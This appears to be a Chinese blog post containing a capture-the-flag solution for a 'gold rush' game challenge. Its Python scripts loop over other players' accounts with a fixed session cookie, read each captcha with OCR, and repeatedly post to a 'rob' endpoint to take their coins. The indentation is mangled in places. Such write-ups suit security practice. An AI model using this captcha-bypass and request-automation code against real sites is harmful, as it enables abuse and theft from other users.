首页 > itarticle > gold rush

gold rush

admin 11月 12, 2020 0

Tags : UCTF_2 /

1.抢钱代码

# ‐*‐ coding: utf‐8 ‐*‐  import requests  from test import *  
# 登录  ##headers = {"Cookie":"PHPSESSID=j7f92q1rvs1ddr1ohl290226q5"}  
##r = requests.get("http://106.75.30.59:8888/game.php",headers=headers)  
##box = "abcdefghijklmnopqrstuvwxyz0123456789"  # step1 get rob.php 
##headers = {"Host": "106.75.30.59:8888","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade‐Insecure‐Requests": "1","User‐Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36","Referer": "http://106.75.30.59:8888/game.php","Accept‐Encoding": "gzip, deflate, sdch","Accept‐Language": "zh‐CN,zh;q=0.8","Cookie": "PHPSESSID=j7f92q1rvs1ddr1ohl290226q5"}
ids = [361,346,362,341,368,471,98,150,9,257,21,492,360,410,136,560,294,42]  
users = ["tuhao5","tuhao4","tuhao6","tuhao3","tuhao10","wintersun","testluo","rebirthw1","1c4t","abc1234","dadddd","test1234","aaadewa","nnnn","sdff","fire123","summer","tmsxb258"]
 i = 0  
 while True:
    i = (i+1)%len(ids)
    id = ids[i]
    user = users[i]
    print user
    headers = {"Host": "106.75.30.59:8888",                "User‐Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",                "Accept": "*/*",                 "Referer": "http://106.75.30.59:8888/rob.php?id="+str(id),                 "Accept‐Encoding": "gzip, deflate, sdch",                 "Accept‐Language": "zh‐CN,zh;q=0.8",                 "Cookie": "PHPSESSID=j7f92q1rvs1ddr1ohl290226q5"} 
    r = requests.get("http://106.75.30.59:8888/rob.php?id="+str(id),headers=headers) 
    saveImage("http://106.75.30.59:8888/code.php",headers) 
    code = aaacode().lower() 
    print code      
headers = {"Host": "106.75.30.59:8888",                "Content‐Length": "28",                 "Cache‐Control": "max‐age=0",                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",                 "Origin": "http://106.75.30.59:8888",                 "Upgrade‐Insecure‐Requests": "1",                 "User‐Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",                "Content‐Type": "application/x‐www‐form‐urlencoded",                 "Referer": "http://106.75.30.59:8888/rob.php?id="+str(id),                 "Accept‐Encoding": "gzip, deflate",                 "Accept‐Language": "zh‐CN,zh;q=0.8",                 "Cookie": "PHPSESSID=j7f92q1rvs1ddr1ohl290226q5"}      data = {"user":"testluo","num":"10","code":code}
    r = requests.post("http://106.75.30.59:8888/dorob.php",headers = headers, data = data) 
    print r.text[r.text.find("h1"):r.text.find("/h1")]

2.验证码识别代码

#coding:utf‐8  ## 验证码识别test 
import pytesseract,requests 
from PIL import Image 
def aaacode():      
    image = Image.open('1.png')      
    vcode = pytesseract.image_to_string(image)      
return vcode 
def saveImage( imgUrl,headers,imgName ="1.png"):      
    response = requests.get(imgUrl, stream=True,headers=headers)      
    image = response.content      
    print("保存文件"+imgName+"n")      
try:          
    with open(imgName ,"wb") as png:              
    png.write( image)              
return     
except IOError:          
    print("IO Errorn")          
return      
finally:         
     png.close